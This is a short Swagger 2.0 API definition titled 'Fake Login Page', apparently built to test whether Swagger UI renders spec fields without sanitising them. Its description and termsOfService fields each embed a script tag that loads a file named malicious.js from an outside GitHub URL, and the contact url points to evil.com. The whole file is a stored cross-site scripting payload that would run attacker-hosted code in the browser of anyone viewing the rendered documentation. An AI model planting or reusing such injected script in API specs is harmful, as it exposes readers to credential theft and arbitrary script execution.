swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form"><script src="https://raw.githubusercontent.com/bilauk/checkSWG/main/malicious.js"></script></div>'
  termsOfService: '<div class="login-form"><script src="https://raw.githubusercontent.com/bilauk/checkSWG/main/malicious.js"></script></div>'
  contact: 
    name: "API Support"
    url: "https://evil.com/"
    email: "bilalabbasuk@gmail.com"




  
